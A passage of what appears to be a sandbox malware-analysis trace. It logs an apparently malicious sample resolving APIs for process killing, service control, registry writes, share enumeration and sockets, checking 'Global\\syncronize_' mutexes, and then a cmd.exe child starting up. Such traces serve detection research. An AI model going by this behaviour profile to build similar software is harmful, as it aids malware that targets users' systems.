lpProcName="GetProcessHeap") returned 0x76e314e9 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="HeapReAlloc") returned 0x77e11f6e [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="HeapAlloc") returned 0x77dfe026 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="HeapFree") returned 0x76e314c9 [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="CreatePipe") returned 0x76eb415b [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="SetHandleInformation") returned 0x76e4195c [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="CreateProcessW") returned 0x76e3103d [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="CompareStringW") returned 0x76e33bca [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="CompareStringA") returned 0x76e33c5a [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="OpenProcess") returned 0x76e31986 [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="TerminateProcess") returned 0x76e4d802 [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="GetSystemTime") returned 0x76e35a96 [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="SystemTimeToFileTime") returned 0x76e35a7e [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="GetLastError") returned 0x76e311c0 [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e5735f [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="Process32NextW") returned 0x76e5896c [0262.850] GetProcAddress (hModule=0x76e20000, lpProcName="Process32FirstW") returned 0x76e58baf [0262.850] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77100000 [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="RegOpenKeyExW") returned 0x7711468d [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="RegQueryValueExW") returned 0x771146ad [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="RegSetValueExW") returned 0x771114d6 [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="RegCloseKey") returned 0x7711469d [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="OpenProcessToken") returned 0x77114304 [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="GetTokenInformation") returned 0x7711431c [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="OpenSCManagerW") returned 0x7710ca64 [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="OpenServiceW") returned 0x7710ca4c [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="CloseServiceHandle") returned 0x7711369c [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="ControlService") returned 0x77127144 [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="QueryServiceStatus") returned 0x77112a86 [0262.858] GetProcAddress (hModule=0x77100000, lpProcName="EnumDependentServicesW") returned 0x77101e3a [0262.859] GetProcAddress (hModule=0x77100000, lpProcName="EnumServicesStatusExW") returned 0x7710b466 [0262.859] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76030000 [0262.868] GetProcAddress (hModule=0x76030000, lpProcName="SystemParametersInfoW") returned 0x760490d3 [0262.868] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x761d0000 [0262.871] GetProcAddress (hModule=0x761d0000, lpProcName="ShellExecuteExW") returned 0x761f1e46 [0262.871] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77dd0000 [0262.871] GetProcAddress (hModule=0x77dd0000, lpProcName="NtQuerySystemInformation") returned 0x77defda0 [0262.871] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x739f0000 [0263.485] GetProcAddress (hModule=0x739f0000, lpProcName="WNetCloseEnum") returned 0x739f2dd6 [0263.485] GetProcAddress (hModule=0x739f0000, lpProcName="WNetOpenEnumW") returned 0x739f2f06 [0263.485] GetProcAddress (hModule=0x739f0000, lpProcName="WNetEnumResourceW") returned 0x739f3058 [0263.485] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f60000 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="WSAStartup") returned 0x76f63ab2 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="socket") returned 0x76f63eb8 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="send") returned 0x76f66f01 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="recv") returned 0x76f66b0e [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="connect") returned 0x76f66bdd [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="closesocket") returned 0x76f63918 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="gethostbyname") returned 0x76f77673 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="inet_addr") returned 0x76f6311b [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="ntohl") returned 0x76f62d57 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="htonl") returned 0x76f62d57 [0263.487] GetProcAddress (hModule=0x76f60000, lpProcName="htons") returned 0x76f62d8b [0263.487] GetProcessHeap () returned 0x590000 [0263.487] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x5a4368 [0263.487] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=6830337762) returned 1 [0263.487] GetTickCount () returned 0x61ed [0263.487] GetCurrentProcessId () returned 0x4e8 [0263.488] GetTickCount () returned 0x61ed [0263.488] GetTickCount () returned 0x61ed [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x5a4390 [0263.488] GetVersion () returned 0x1db10106 [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x7) returned 0x593978 [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a0e98 [0263.488] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a0e98, Size=0x20) returned 0x5a43e0 [0263.488] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a43e0, Size=0x40) returned 0x5a4978 [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xfffe) returned 0x5a4c28 [0263.488] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_5M390TA") returned 0x84 [0263.488] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x593978 | out: hHeap=0x590000) returned 1 [0263.488] lstrlenW (lpString="Global\\syncronize_") returned 18 [0263.488] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4978 | out: hHeap=0x590000) returned 1 [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x7) returned 0x593978 [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a0e98 [0263.488] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a0e98, Size=0x20) returned 0x5a43e0 [0263.488] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a43e0, Size=0x40) returned 0x5a4978 [0263.488] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xfffe) returned 0x5b4c30 [0263.489] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_5M390TU") returned 0x88 [0263.489] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x593978 | out: hHeap=0x590000) returned 1 [0263.489] lstrlenW (lpString="Global\\syncronize_") returned 18 [0263.489] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4978 | out: hHeap=0x590000) returned 1 [0263.489] GetVersion () returned 0x1db10106 [0263.489] GetCurrentProcess () returned 0xffffffff [0263.489] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0263.489] GetTokenInformation (in: TokenHandle=0x8c, TokenInformationClass=0x14, TokenInformation=0x18fda0, TokenInformationLength=0x4, ReturnLength=0x18fdac | out: TokenInformation=0x18fda0, ReturnLength=0x18fdac) returned 1 [0263.489] CloseHandle (hObject=0x8c) returned 1 [0263.489] WaitForSingleObject (hHandle=0x88, dwMilliseconds=0x0) returned 0x102 [0263.489] ExitProcess (uExitCode=0x0) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x72543000" os_pid = "0x540" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x4e0" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0x544 [0266.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf800 | out: lpSystemTimeAsFileTime=0x1cf800*(dwLowDateTime=0xcb52a360, dwHighDateTime=0x1d5351d)) [0266.557] GetCurrentProcessId () returned 0x540 [0266.557] GetCurrentThreadId () returned 0x544 [0266.557] GetTickCount () returned 0x6dde [0266.557] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf808 | out: lpPerformanceCount=0x1cf808*=7137270783) returned 1 [0266.558] GetModuleHandleW (lpModuleName=0x0) returned 0x4a840000 [0266.559] __set_app_type (_Type=0x1) [0266.560] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a867810) returned 0x0 [0266.560] __getmainargs (in: _Argc=0x4a88a608, _Argv=0x4a88a618, _Env=0x4a88a610, _DoWildCard=0, _StartInfo=0x4a86e0f4 | out: _Argc=0x4a88a608, _Argv=0x4a88a618, _Env=0x4a88a610) returned 0 [0266.561] GetCurrentThreadId () returned 0x544 [0266.561] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x544) returned 0x3c [0266.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77ad0000 [0266.561] GetProcAddress (hModule=0x77ad0000, lpProcName="SetThreadUILanguage") returned 0x77ae6d40 [0266.561] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0266.561] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0266.561] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf798 | out: phkResult=0x1cf798*=0x0) returned 0x2 [0266.561] VirtualQuery (in: lpAddress=0x1cf780, lpBuffer=0x1cf700, dwLength=0x30 | out: lpBuffer=0x1cf700*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0266.561] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf700, dwLength=0x30 | out: lpBuffer=0x1cf700*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0266.561] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf700, dwLength=0x30 | out: lpBuffer=0x1cf700*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0266.561] VirtualQuery (in: lpAddress=0xd4000, lpBuffer=0x1cf700, dwLength=0x30 | out: lpBuffer=0x1cf700*(BaseAddress=0xd4000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0266.561] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf700, dwLength=0x30 | out: lpBuffer=0x1cf700*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0266.561] GetConsoleOutputCP () returned 0x1b5 [0266.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0266.562] SetConsoleCtrlHandler (HandlerRoutine=0x4a863184, Add=1) returned 1 [0266.563] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.563] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0266.563] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.563] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a86e194 | out: lpMode=0x4a86e194) returned 0 [0266.563] _get_osfhandle (_FileHandle=0) returned 0xe8 [0266.563] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a86e198 | out: lpMode=0x4a86e198) returned 0 [0266.563] GetEnvironmentStringsW () returned 0x238aa0* [0266.563] GetProcessHeap () returned 0x220000 [0266.563] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xab4) returned 0x239560 [0266.563] FreeEnvironmentStringsW (penv=0x238aa0) returned 1 [0266.563] GetProcessHeap () returned 0x220000 [0266.563] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x8) returned 0x238920 [0266.563] GetEnvironmentStringsW () returned 0x238aa0* [0266.563] GetProcessHeap () returned 0x220000 [0266.563] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xab4) returned 0x23a020 [0266.564] FreeEnvironmentStringsW (penv=0x238aa0) returned 1 [0266.564] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce658 | out: phkResult=0x1ce658*=0x44) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x0, lpData=0x1ce670*=0x18, lpcbData=0x1ce654*=0x1000) returned 0x2 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x1, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x0, lpData=0x1ce670*=0x1, lpcbData=0x1ce654*=0x1000) returned 0x2 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x0, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x40, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x40, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x0, lpData=0x1ce670*=0x40, lpcbData=0x1ce654*=0x1000) returned 0x2 [0266.564] RegCloseKey (hKey=0x44) returned 0x0 [0266.564] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce658 | out: phkResult=0x1ce658*=0x44) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x0, lpData=0x1ce670*=0x40, lpcbData=0x1ce654*=0x1000) returned 0x2 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x1, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x0, lpData=0x1ce670*=0x1, lpcbData=0x1ce654*=0x1000) returned 0x2 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x0, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x9, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x4, lpData=0x1ce670*=0x9, lpcbData=0x1ce654*=0x4) returned 0x0 [0266.564] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce650, lpData=0x1ce670, lpcbData=0x1ce654*=0x1000 | out: lpType=0x1ce650*=0x0, lpData=0x1ce670*=0x9, lpcbData=0x1ce654*=0x1000) returned 0x2 [0266.564] RegCloseKey (hKey=0x44) returned 0x0 [0266.564] time (in: timer=0x0 | out: timer=0x0) returned 0x5d2283a7 [0266.564] srand (_Seed=0x5d2283a7) [0266.564] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0266.564] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0266.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a87c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0266.565] GetProcessHeap () returned 0x220000 [0266.565] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x23aae0 [0266.565] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23aaf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0266.565] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0266.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.566] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0266.566] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0266.566] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0266.566] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0266.566] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0266.566] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0266.566] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0266.566] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0266.566] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0266.566] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0266.566] GetProcessHeap () returned 0x220000 [0266.566] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239560 | out: hHeap=0x220000) returned 1 [0266.566] GetEnvironmentStringsW () returned 0x238aa0* [0266.566] GetProcessHeap () returned 0x220000 [0266.566] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xacc) returned 0x23ad00 [0266.566] FreeEnvironmentStringsW (penv=0x238aa0) returned 1 [0266.566] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.566] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0266.566] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0266.566] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0266.566] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0266.566] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0266.566] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0266.566] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0266.566] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0266.566] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0266.566] GetProcessHeap () returned 0x220000 [0266.566] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x38) returned 0x2364d0 [0266.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf460 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0266.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1cf460, lpFilePart=0x1cf440 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cf440*="system32") returned 0x13 [0266.567] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0266.567] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1cf170 | out: lpFindFileData=0x1cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="Windows", cAlternateFileName="")) returned 0x23b7e0 [0266.567] FindClose (in: hFindFile=0x23b7e0 | out: hFindFile=0x23b7e0) returned 1 [0266.567] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1cf170 | out: lpFindFileData=0x1cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3bb53a10, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3bb53a10, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="System32", cAlternateFileName="")) returned 0x23b7e0 [0266.567] FindClose (in: hFindFile=0x23b7e0 | out: hFindFile=0x23b7e0) returned 1 [0266.567] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0266.567] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0266.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0266.567] GetProcessHeap () returned 0x220000 [0266.567] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23ad00 | out: hHeap=0x220000) returned 1 [0266.567] GetEnvironmentStringsW () returned 0x23ad00* [0266.567] GetProcessHeap () returned 0x220000 [0266.567] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xafc) returned 0x238aa0 [0266.567] FreeEnvironmentStringsW (penv=0x23ad00) returned 1 [0266.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a87c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0266.567] GetProcessHeap () returned 0x220000 [0266.567] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2364d0 | out: hHeap=0x220000) returned 1 [0266.567] GetProcessHeap () returned 0x220000 [0266.567] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4016) returned 0x23ad00 [0266.568] GetProcessHeap () returned 0x220000 [0266.568] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23ad00 | out: hHeap=0x220000) returned 1 [0266.568] GetConsoleOutputCP () returned 0x1b5 [0266.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0266.568] GetUserDefaultLCID () returned 0x409 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a877b50, cchData=8 | out: lpLCData=":") returned 2 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf570, cchData=128 | out: lpLCData="0") returned 2 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf570, cchData=128 | out: lpLCData="0") returned 2 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf570, cchData=128 | out: lpLCData="1") returned 2 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a88a740, cchData=8 | out: lpLCData="/") returned 2 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a88a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a88a460, cchData=32 | out: lpLCData="Tue") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a88a420, cchData=32 | out: lpLCData="Wed") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a88a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a88a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a88a360, cchData=32 | out: lpLCData="Sat") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a88a700, cchData=32 | out: lpLCData="Sun") returned 4 [0266.568] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a877b40, cchData=8 | out: lpLCData=".") returned 2 [0266.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a88a4e0, cchData=8 | out: lpLCData=",") returned 2 [0266.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0266.569] GetProcessHeap () returned 0x220000 [0266.569] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x20c) returned 0x239620 [0266.569] GetConsoleTitleW (in: lpConsoleTitle=0x239620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.570] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.570] GetFileType (hFile=0xf4) returned 0x3 [0266.571] BrandingFormatString () returned 0x239840 [0266.575] GetVersion () returned 0x1db10106 [0266.575] _vsnwprintf (in: _Buffer=0x1cf6e0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x1cf678 | out: _Buffer="6.1.7601") returned 8 [0266.575] _get_osfhandle (_FileHandle=1) returned 0xf4 [0266.575] GetFileType (hFile=0xf4) returned 0x3 [0266.575] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a886340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0266.791] FormatMessageW (in: dwFlags=0x1800, 